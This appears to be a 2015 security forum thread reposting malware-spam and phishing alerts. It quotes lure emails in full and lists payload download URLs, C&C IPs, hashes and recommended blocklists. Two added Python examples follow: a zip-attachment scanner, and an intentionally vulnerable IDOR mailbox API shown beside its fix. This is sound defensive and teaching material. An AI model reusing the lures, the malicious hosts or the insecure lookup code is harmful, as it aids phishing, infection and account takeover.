http ://95.163.121.71 :8080/mopsi/popsi.php
http ://95.163.121.72 :8080/mopsi/popsi.php
http ://136.243.237.204 :8080/mopsi/popsi.php
Note the two adjacent IPs of 95.163.121.71 and 95.163.121.72 which belong to Digital Networks CJSC in Russia (aka DINETHOSTING), an IP range of 95.163.64.0/18 that I would recommend you consider blocking. 136.243.237.204 is a Hetzner IP. The macro downloads a file g08.exe from these locations which is then saved as %TEMP%\UGvdfg.exe. This has a VirusTotal detection rate of 4/57*. That VT report also shows the malware attempting to POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known bad IP. The Malwr report is inconclusive, but this executable probably drops a Dridex DLL.
Recommended blocklist:
194.146.136.1
95.163.121.71
95.163.121.72
136.243.237.204
UPDATE: the following -are- Dridex C&C servers which you should also block:
80.237.255.196 "
1] https://www.virustotal.com/en/file/58aa6018bb493f02a4981adc395bda36a62235286b804eac6c493b16a7e76881/analysis/1421313787/
2] https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421313798/
3] https://www.virustotal.com/en/file/d1fd0df8db5c3283426d945be8e6cb466c455a1b1a9a534b5f1d33b3c81c5f09/analysis/1421313810/
* https://www.virustotal.com/en/file/f4c36c6e702324f0edb9fd62d2d50bb08c6507ff53847f2816870414dff53eaf/analysis/1421313825/
- http://myonlinesecurity.co.uk/payment-request-14-jan-2015-word-doc-malware/
15 Jan 2015
15 January 2015 : ADV0291LO.doc - Current Virus total detections: 3/55*
15 January 2015 : 57959SI.xls (35 kb) - Current Virus total detections: 3/57**
| 3093720WF.xls (47 kb) - Current Virus total detections: 2/57***
* https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421309631/
** https://www.virustotal.com/en/file/0d8ebd5567fc7c9fdb87dc36673bb5b4e4f193efacfdd6bfddc36dc5b2422325/analysis/1421316140/
*** https://www.virustotal.com/en/file/a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df/analysis/1421315881/
___
Fake 'open24 .ie important changes alert' SPAM – malware
- http://myonlinesecurity.co.uk/open24-ie-important-changes-servicesemail-alert-malware/
15 Jan 2015 - "'Some important changes to some services' (email alert) pretending to come from Open24 <inf01@ open24 .ie> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fwd: Software Upgrade
Dear
Open24 Customer,
We have now implemented a number of
changes to our Internet Banking service. This is to ensure the highest
level of security of information passing between you and our server.
To have access to this service, simply follow the button below and activate the service...
Kind regards
Open24
This email is personal & confidential and is intended for the recipient only...
15 January 2015: open24changes.zip (523 kb) : Extracts to: Payment.scr
Current Virus total detections: 17/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/190aaa3ee308ecab4609e7229ee654fb7ab34044d324d65658b2789a9858a768/analysis/1421332957/
___
Fake 'ADP Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/johnny-west-adp-invoice-week-ending-01112015-fake-pdf-malware/
15 Jan 2015 - "'ADP Invoice for week ending 01/11/2015' pretending to come from Johnny.West@ adp .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.
15 January 2015: invoice_418270412.pdf.zip (11kb): Extracts to: invoice_418270412.pdf.scr
Current Virus total detections: 5/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a33b2a98df1b9b973471de47ad8fc750278a42890ed5924bf3ea23cbd448db7d/analysis/1421335768/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.120.16.66: https://www.virustotal.com/en/ip-address/174.120.16.66/information/
69.49.101.51: https://www.virustotal.com/en/ip-address/69.49.101.51/information/
___
Fake 'HSBC Payment Advice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-advice-refgb956959-chaps-credits-fake-pdf-malware/
15 Jan 2015 - "'Payment Advice – Advice Ref:[GB956959] / CHAPS credits' pretending to come from HSBC Advising Service [mailto:Bankline.Administrator@ nutwest .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link or open the attachment... The email looks like:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is for your reference only.
Download link: <redacted>
Yours faithfully,
Global Payments and Cash Management
HSBC ...
When you follow the... link you get a page looking like this, where depending on which browser you are using, you might get a direct download of the zip file containing the -malware- or you might get the message to follow the link... which will give you the malware:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/avralab.jpg
15 January 2015: doc974_pdf.zip (11kb) : Extracts to: doc963_pdf.exe
Current Virus total detections: 4/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4c00deb8efcca9de6a86809eeb6613037d4820a56923bf4c262367c4c744f69e/analysis/1421341083/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
66.147.240.173: https://www.virustotal.com/en/ip-address/66.147.240.173/information/
:fear::fear: :mad:
AplusWebMaster
2015-01-16, 13:53
FYI...
Affordable Care Act Phishing Campaign
- https://www.us-cert.gov/ncas/current-activity/2015/01/15/Affordable-Care-Act-Phishing-Campaign
Jan 15, 2015 - "US-CERT is aware of a phishing campaign purporting to come from a U.S. Federal Government Agency. The phishing emails reference the Affordable Care Act in the subject and claim to direct users to health coverage information, but instead direct them to sites which attempt to elicit private information or install malicious code. US-CERT encourages users to take the following measures to protect themselves:
- Do not follow links or download attachments in unsolicited email messages.
- Maintain up-to-date antivirus software.
- Refer to the Avoiding Social Engineering and Phishing Attacks Security Tip* for additional information on social engineering attacks..."
* https://www.us-cert.gov/ncas/tips/ST04-014
___
Fake 'voice mail' SPAM - PDF malware
- http://myonlinesecurity.co.uk/microsoft-outlook-voicemail-received-voice-mail-fake-pdf-malware/
16 Jan 2015 - "'You have received a voice mail' pretending to come from Microsoft Outlook Voicemail <no-reply@your own domain> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE549-693-8777.wav (20 KB)
Caller-Id: 549-693-8777
Message-Id: 8X3NI1
Email-Id: a.j.lefeber14d @ ...
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
They are not being sent by your own server or email server, but by one of the botnets...
16 January 2015: VOICE44982109219.zip (11kb) : Extracts to: VOICE44982109219.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e1c3617c620614697485b45bb6760e94cea16758c15fa0374629c4a15b54be08/analysis/1421413445/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.185.16.192: https://www.virustotal.com/en/ip-address/192.185.16.192/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___
Adobe Phish back in-the-Wild
- https://blog.malwarebytes.org/fraud-scam/2015/01/adobe-phish-back-in-the-wild/
Jan 15, 2015 - "We recently found a -compromised- site serving what appears to be an Adobe phish. Like most phishing campaigns, this one may have originated from a spammed email. Although we do not have the actual sample of said email, it pays to be familiar with what the fraud page looks like and its content, too. Please direct your attention to the screenshot below:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/00-default.png
We can deduce from the page’s content that the spam may have originated from a spoofed Adobe address, promising an important document the recipient has to see. In order to do so, they are then instructed to access their Adobe account by entering their email credentials, specifically for AOL, Gmail, Outlook, and Yahoo! The page also caters to credentials for other email providers. Visitors clicking either of the email service brands at the right side of the page changes the user entry fields at the left side to match with the look of the real thing... Some of us may quickly and easily identify that the whole thing is a phishing campaign, but some may also not realize this until it’s too late. Be extra careful when dealing with emails purporting to have come from Adobe... It also pays to remain informed and read Adobe’s page here* on how to avoid falling for phishing schemes."
* https://www.adobe.com/security/prevent-phishing.html
___
North Korean News Agency site serves File Infector
- http://blog.trendmicro.com/trendlabs-security-intelligence/north-korean-news-agency-website-serves-file-infector/
Jan 16, 2015 - "We were recently alerted to reports* claiming that the website of North Korea’s official news service, www.kcna .kp, had been delivering -malware- via embedded malicious code. One of the photo spreads on the website was found to contain malware that launched a watering hole attack on individuals who came to visit the website and its other pages. Below is an infection diagram for the malware associated with this attack:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Diagram2.jpg
The mother file in this attack is detected as PE_WINDEX.A-O. As seen in the diagram above, the executable file mscaps.exe drops wtime32.dll, which contains the infection code and backdoor routine. Another executable file mscaps.exe injects code to explorer.exe to stay memory resident. As such, every time the affected system reboots, the malware runs on the system and begins its infection routine. Explorer.exe executes the infection code and targets .EXE files in drive types that are removable or shared, with drive letters traversed from A-Z. We observed that it skips fixed drives. Apart from explorer.exe, this file infector looks for the following processes where it injects its malicious code:
iexplore.exe
ieuser.exe
firefox.exe
chrome.exe
msimn.exe
msnmsgr.exe
outlook.exe
winmail.exe
yahoomessenger.exe
ftp.exe
The website contains an -infected- .ZIP file named FlashPlayer.zip. Our initial analysis shows that the outdated Flash Player installer drops the main file infector WdExt.exe, which we detect as PE_WINDEX.A-O. It copies and renames the file Ws2_32.dll, which is the file for the Windows Sockets API used by most Internet and network applications to handle network connections. PE_WINDEX.A-O also creates the file SP{random}.tmp, which contains system information that may be responsible for the malware’s information theft routines. It gathers data such as date and time, computer name, user name, OS information, MAC address, and more. The embedded malicious code runs on Internet Explorer version 11.0, Mozilla Firefox versions 10.0.9 and 36.0, Safari versions 7.0.3 and 4.0, Opera version 9.00 and 12.14, and Google Chrome 41.0.2228.0. The browsers we tested all displayed the code snippet that includes /download/FlashPlayer10.zip. Based on replicating the attack with an infected sample (calc.exe), we noticed that the file size is almost the same size as the mother file infector, PE_WINDEX.A-O. Additional analysis also shows that PE_WINDEX.A-O has developer metadata that lists its copyright as © Microsoft Corporation. All rights reserved, with its publisher listed as Microsoft Corporation. Its description and comments contain the text Windows Defender Extension, among other listed information. This may be a disguise for the malware so that users won’t be suspicious about the file..."
* http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/
___
Google finally quashes month-Old Malvertising Campaign
- http://it.slashdot.org/story/15/01/16/0129244/google-finally-quashes-month-old-malvertising-campaign
Jan 16, 2015 - "Since the middle of December, visitors to sites that run Google AdSense ads have intermittently found themselves -redirected- to other sites featuring spammy offerings for anti-aging and brain-enhancing products*. While webmasters who have managed to figure out which advertisers are responsible could quash the attacks on their AdSense consoles, only now has Google itself managed to track down the villains and -ban- them from the service."
* http://www.itworld.com/article/2871035/google-nixes-widespread-malvertising-attack.html
Jan 14, 2015
:fear::fear: :mad:
AplusWebMaster
2015-01-17, 18:45
FYI...
iTunes invoice – phish
- http://myonlinesecurity.co.uk/itunes-invoice-id31wx175t-phishing/
17 Jan 2015 - "'ITunes Your invoice #ID31WX175T' pretending to come from iTunes Store <do_not_reply@ btconnect .com> is one of the latest -phish- attempts to steal your Bank, credit card and personal details. This one is slightly different to usual ones in that it is designed to make you think that it is a mistake and that you need to enter all your bank/credit card details in order to -cancel- the transaction that you never made in the first place... persuading the recipient that somebody must have compromised their ITunes account and telling you to change all the details in it... not only would you lose a lot of money but could also end up losing a lot more. This one only wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well*...
* http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
looks at first glance like the genuine Itunes website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Store-Purchase-Confirmation.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
:fear: :mad:
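Several posts above (the vFax, ADP, HSBC, Open24 and voice mail runs, and the iTunes advice just above) describe the same trick: a zip that extracts to a .pdf.scr or .exe with a document icon. The following Python check is an added example, not code from this thread or from myonlinesecurity.co.uk; it inspects a zip attachment in memory and flags members by deceptive double extension and by PE content regardless of name. The sample zip and its "MZ" stub are constructed here, not real samples.

```python
import io
import zipfile

# Extensions Windows will run on double-click (the real type behind the
# "spoofed icon" files: .scr is a screensaver, i.e. a plain PE executable).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf"}
# Document-like extensions the fake names try to impersonate.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "txt"}


def classify_name(name: str):
    """Return a reason string if the filename looks like a disguised executable, else None."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2:
        return None
    ext = parts[-1]
    if ext not in EXECUTABLE_EXTS:
        return None
    # e.g. invoice_418270412.pdf.scr: a document extension hides an executable one.
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTS:
        return f"double extension: looks like .{parts[-2]} but is .{ext}"
    return f"executable attachment: .{ext}"


def scan_zip(data: bytes):
    """Inspect every member of a zip attachment without extracting it to disk.

    Returns a list of (member name, reason) for each suspicious member.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reason = classify_name(info.filename)
            if reason is None:
                # The name alone is not enough: read only the 2-byte magic to
                # catch a PE file that was renamed to look like a document.
                with zf.open(info) as member:
                    if member.read(2) == b"MZ":
                        reason = "content is a PE executable (MZ header) despite the name"
            if reason:
                findings.append((info.filename, reason))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment (hypothetical member names, inert MZ stub)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        fake_pe = b"MZ" + b"\x00" * 62  # just a DOS-header magic, not a runnable program
        zf.writestr("invoice_418270412.pdf.scr", fake_pe)   # double extension
        zf.writestr("report.pdf", fake_pe)                  # renamed executable
        zf.writestr("readme.txt", b"plain text, nothing suspicious")
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in scan_zip(build_sample_zip()):
        print(f"SUSPICIOUS {name}: {why}")
```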
AplusWebMaster
2015-01-19, 15:09
FYI...
Fake 'order payment slip' SPAM - malware
- http://myonlinesecurity.co.uk/pierre-jude-bukasonventure-com-re-order-payment-slip-malware/
19 Jan 2015 - "'RE: order payment slip' coming from info@ bukasonventure .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is just to inform you that we have made the payment as Requested.
We try to contact you about the payment we made here in our office, but because the payment was made on Friday evening before the bank closed, and our server was down,
PLEASE REFER TO THE ATTACHMENT SLIP
Best regards,
Mr Pierre Jude Genaral Manager
323 Collier Road, Bayswater WA 6053
Phone: (1) 9379 0811
Fax: (1) 9379 0822 ...
These actually look like they are coming from bukasonventure .com which is hosted in USA and was only registered on 15 January 2015. This might be a compromised server, have an open relay allowing the emails to be sent or have been registered under a false set of details with the aim of sending malicious emails and spam. The more I look at this one, the more I am convinced the entire set up has been done with the aim of distributing malware. The domain was registered on 15 January 2015. The computer sending IP 120.140.55.192 is listed as Malaysia...
19 January 2015: order-slip.rar : Extracts to: order-slip.exe
Current Virus total detections: 23/56* ... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbf4c8a93ae637d8436ede424b617003105b094cced64c712ec25c68c3a61988/analysis/1421652817/
___
Verizon vuln exposed email accounts - “zombie cookies”
- http://www.securityweek.com/verizon-fixes-vulnerability-exposing-user-email-accounts
Jan 19, 2015 - "... discovered the flaw while analyzing the Android app for Verizon’s fiber optic Internet, telephone and television service FiOS. While investigating the requests sent by the application, the expert noticed a username parameter called uid. By changing the value of this parameter with a different customer’s username, Westergren got the contents of the targeted user’s email account. The researcher* later determined that other API methods for this particular widget were affected as well. For example, by changing the values of the uid and mid parameters in a certain request, he could read individual emails. He even managed to send out an email on another user’s behalf by exploiting the vulnerability... The proof-of-concept was sent to Verizon’s security team on January 14. The telecoms giant -confirmed- the existence of the issue by the next day. The vulnerability was fixed on January 16. For responsibly disclosing the security hole, Westergren was rewarded with free FiOS Internet for one year... had been using so-called “zombie cookies” to track subscribers even if they had used private browsing, cleared their cookies, or if they had opted out. The existence of Verizon’s controversial system came to light last year, but the company -denied- using the tracking method in its own business model. After being exposed... announced on Friday that it will suspend its “zombie cookies” program..."
* http://randywestergren.com/critical-vulnerability-verizon-mobile-api-compromising-user-email-accounts/
___
LockHeedMartin Fax Spam
- http://threattrack.tumblr.com/post/108560007998/lockheedmartin-fax-spam
Jan 19, 2015 - "Subjects Seen:
[Lockheed Martin UK Ltd Integrated Systems] New fax message - LFQ.71021C670.3249
Typical e-mail details:
FAX: +07755-090107
Date: 2015.01.18 17:33:18 CST
Pages: 4
Reference number: LFQ.71021C670.3249
Filename: curbed.zip
—
Lockheed Martin UK Ltd Integrated Systems Michaele Vivas
Malicious URLs:
breteau-photographe .com/tmp/pack.tar.gz
voigt-its .de/fit/pack.tar.gz
maisondessources .com/assets/pack.tar.gz
pleiade.asso .fr/piwigotest/pack.tar.gz
scolapedia .org/histoiredesarts/pack.tar.gz
Malicious File Name and MD5:
curbed .scr (BDFE7EB4A421B9A989C85BFFF7BACE2C)
1715030703 .exe (4ebd076047a04290f23f02d6ecd16fee)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/93353be3c5a5dd804da246f3da7ec037/tumblr_inline_nifqztQaEr1r6pupn.png
Tagged: LockHeedMartin, Citroni, dalexis
___
Fake 'Natwest' SPAM - leads to malware
- http://blog.dynamoo.com/2015/01/malware-spam-natwest.html
19 Jan 2015 - "This spam claiming to be from NatWest bank (or is it nEtwest?) leads to malware.
From: NatWest [donotreply@ netwest .uk]
Date: 19 January 2015 at 14:02
Subject: Important - Please complete attached form ...
Dear Customer
Please find below your Banking Form for Bankline.
<URL redacted>
Please complete Bankline Banking Form :
- Your Customer Id and User Id - which are available from your administrator if you have not already received them
Additionally, if you wish to access Bankline training, simply follow the link below
<URL redacted>
If you have any queries or concerns, please telephone your Electronic Banking Help Desk.
National Westminster Bank Plc, Registered in England No. 929027. Registered Office: 135 Bishopsgate, London EC2M 3UR.
Authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority...
In this case the link in the email goes to www .ipawclp .com/NEW-IMPORTANT-NATWEST_FORM/new.bankline_document .html where it hits a couple of scripts at:
http ://restaurantratiobeach .ro/js/jquery-1.39.15.js
http ://utokatalin .ro/js/jquery-1.39.15.js
In turn, that leads to a ZIP file download which contains an EXE file which is slightly different each time it downloads, with low detection rates in all cases [1] [2] [3]. The name of the ZIP file and EXE varies, but is in the format doc12345.exe and doc54321.zip. Of note is a sort-of-informational screen on the download page:
> https://2.bp.blogspot.com/-BbZFLI01zzE/VL0eAGDsU8I/AAAAAAAAGIQ/MlAa94-Kmlc/s1600/fake-natwest.png
Automated analysis is presently inconclusive...
UPDATE:
@snxperxero suggests blocking the following sites:
202.153.35.133
loveshopclothing .com
credit490 .com "
1] https://www.virustotal.com/en/file/22599e7a2aa4c5d047fe075a7dec1e8aba4945dc08b79137571175d1703b0d70/analysis/1421678510/
2] https://www.virustotal.com/en/file/c955cefd43d594af4f36a5442878498e446ac80d63810b5052e852ea46a99d57/analysis/1421678516/
3] https://www.virustotal.com/en/file/76c76752649a6241f28d3134df5069c58296d3888a9bac17c6b4ccec843658fb/analysis/1421678522/
___
Fake 'Insurance Inspection' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
19 Jan 2015 - "This spam does -not- come from FMG Support Group Ltd, but instead it is a forgery. FMG are -not- sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From: repairermessages@ fmg .co.uk
Date: 19 January 2015 at 07:24
Subject: Insurance Inspection Arranged AIG02377973
FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.
Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@ fmg .co.uk
FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.
Tel: 0844 243 8888 ...
Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least -two- different versions, neither of which are detected by AV vendors [1] [2]. These documents contain -two- slightly different malicious macros... which attempt to download a further component from:
http ://chilan .ca/js/bin.exe
http ://techno-kar .ru/js/bin.exe
This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57*. The Malwr report shows it attempting to communicate with the following IPs:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These two IP addresses have been used by this -malware- for a long time, I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53**."
1] https://www.virustotal.com/en/file/2ba965fec6d3f369b617ec192376feb53673577af88fb218dd15dc33069384bb/analysis/1421656771/
2] https://www.virustotal.com/en/file/5afe6253b435668f7fb449bd75a53532f9237e738f4bbc83c511bdbd4df81fab/analysis/1421657737/
___
Fake '19TH JANUARY 2015.doc' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-traci-wilson.html
19 Jan 2015 - "This rather terse spam does -not- actually come from Davies Crane Hire, but it is a -forgery- with a malicious Word document attached. Davies Crane Hire have not been hacked or compromised, and they are -not- sending out this spam.
From: Traci Wilson [t.wilson@ daviescranehire .co.uk]
Date: 19 January 2015 at 09:05
Subject: 19TH JANUARY 2015.doc
There is -no- body text, just an attachment called 19TH JANUARY 2015.doc which contains a malicious macro.
The documents in use and the payload are identical to this spam run* that preceded it. At the moment, everything has a very low detection rate. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
- http://myonlinesecurity.co.uk/traci-wilson-daviescranehire-co-uk-19th-january-2015-xlsx-word-doc-malware/
19 Jan 2015
___
Fake 'tax refund' Phish...
- http://myonlinesecurity.co.uk/hm-revenue-customs-received-tax-refund-payment-phishing/
19 Jan 2015 - "'HM Revenue and Customs – You have received a tax refund payment !' is an email pretending to come from HM Revenue & Customs <tax@ hmrc .gov .uk> . One of the major common subjects in a phishing attempt is -Tax returns- where especially in the UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... If you follow the link you see a webpage looking like this where they want your email address and name:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want -all- your banking and credit information:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish2.png
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear: :mad:
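Added example, not code from the SecurityWeek article, from Westergren or from Verizon: the class of bug described above is an insecure direct object reference, where a client-supplied uid (and mid) parameter selects whose data is returned. The vulnerable lookup is shown beside a hardened one that ties the lookup to the authenticated session. The mailbox data, the Session type and the parameter names here are constructed for illustration.

```python
"""
Added example (not code from the article, Westergren or Verizon): an
insecure direct object reference of the kind described above, where a
client-supplied `uid` (and `mid`) parameter selects whose data is
returned, next to a hardened version that ties the lookup to the
authenticated session. Mailbox data, Session type and parameter names
are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample data: each customer's mailbox, keyed by message id.
MAILBOXES: Dict[str, Dict[str, str]] = {
    "alice": {"m1": "Your statement is ready", "m2": "Welcome to the service"},
    "bob":   {"m7": "Appointment confirmed", "m8": "Router firmware update"},
}


@dataclass
class Session:
    """Identity established at login; the server, not the client, sets it."""
    user: str


class Forbidden(Exception):
    pass


def _require_login(session: Optional[Session]) -> Session:
    if session is None:
        raise Forbidden("login required")
    return session


def list_mail_vulnerable(session: Optional[Session], params: dict) -> List[str]:
    """Authenticated but not authorized: any logged-in caller who changes
    params['uid'] receives another customer's mailbox."""
    _require_login(session)
    return list(MAILBOXES.get(params["uid"], {}).values())


def read_message_vulnerable(session: Optional[Session], params: dict) -> str:
    """Same defect one level down: uid and mid are both trusted as given."""
    _require_login(session)
    return MAILBOXES[params["uid"]][params["mid"]]


def list_mail_fixed(session: Optional[Session], params: dict) -> List[str]:
    """The object owner comes from the session. A uid the client still sends
    is compared with it and rejected on mismatch, which also gives the server
    a loggable signal that someone is probing the API."""
    s = _require_login(session)
    uid = params.get("uid", s.user)
    if uid != s.user:
        raise Forbidden(f"{s.user!r} may not read mailbox {uid!r}")
    return list(MAILBOXES.get(uid, {}).values())


def read_message_fixed(session: Optional[Session], params: dict) -> str:
    """Look the message up only inside the caller's own mailbox, so a mid
    belonging to someone else is simply not found."""
    s = _require_login(session)
    mailbox = MAILBOXES.get(s.user, {})
    try:
        return mailbox[params["mid"]]
    except KeyError:
        raise Forbidden(f"no message {params['mid']!r} in {s.user!r}'s mailbox") from None
```

The point of the fixed versions is that authentication (is someone logged in?) and authorization (may this principal read this object?) are separate checks; the vulnerable versions only do the first. Rejecting a mismatched uid rather than silently substituting the session user also leaves an audit trail when the parameter is being tampered with.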
AplusWebMaster
2015-01-20, 14:43
FYI...
Fake 'Proforma Invoice' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
20 Jan 2015 - "This -fake- invoice leads to malware. It is not being sent by Big K Products UK Ltd, their systems have not been hacked or compromised. Instead, the email is a -forgery- designed to get you to click the malicious attachment.
From: Monika [monika.goetz@ bigk .co.uk]
Date: 20 January 2015 at 07:18
Subject: Proforma Invoice
Please find enclosed the proforma invoice for your order. Please let me know when payment has been made, so that the goods can be despatched.
Kind regards,
Monika Goetz
Sales & Marketing Co-ordinator
The document attached is Proforma.doc which is currently undetected by AV vendors. It contains a malicious macro... which attempts to download a binary from:
http ://solutronixfze .com/js/bin.exe
..which is saved to %TEMP%\324234234.exe. This has a VirusTotal detection rate of 2/56* and the Malwr report shows it attempting to phone home to:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These IPs have been used many times in similar recent attacks and I recommend you block them. It also drops a DLL with a VirusTotal detection rate of 2/57**. The payload appears to be the Dridex banking trojan. See also this post*** about a related spam run also in progress this morning."
* https://www.virustotal.com/en/file/0dd553a3e401941a044412406dee6c83fc193bb5c5d19140c61a11aa0e346503/analysis/1421744001/
** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421744963/
*** http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
- http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
20 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Big-K-proforma-invoice.png
> https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/
___
Fake 'Barclays Online Bank [security-update]' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-barclays-important-update.html
20 Jan 2015 - "This -fake- Barclays spam leads to malware.
From: Barclays Online Bank [security-update@ barclays .com]
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: <URL redacted>
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
